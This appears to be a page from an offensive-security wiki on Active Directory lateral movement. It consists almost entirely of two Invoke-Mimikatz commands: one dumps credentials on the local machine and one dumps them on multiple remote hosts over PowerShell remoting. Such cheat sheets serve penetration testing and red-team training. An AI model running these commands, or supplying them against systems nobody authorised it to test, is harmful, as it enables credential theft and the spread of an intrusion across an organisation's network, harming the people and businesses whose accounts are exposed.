> For the complete documentation index, see [llms.txt](https://wiki.bufu-sec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.bufu-sec.com/active-directory/lateral_movement/credential_dumping.md).

# Credential Dumping

## Invoke-Mimikatz

```powershell
# Dump on local machine
Invoke-Mimikatz -DumpCreds

# Dump credentials on multiple remote machiens through PSRemoting cmdlet Invoke-Command
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
```
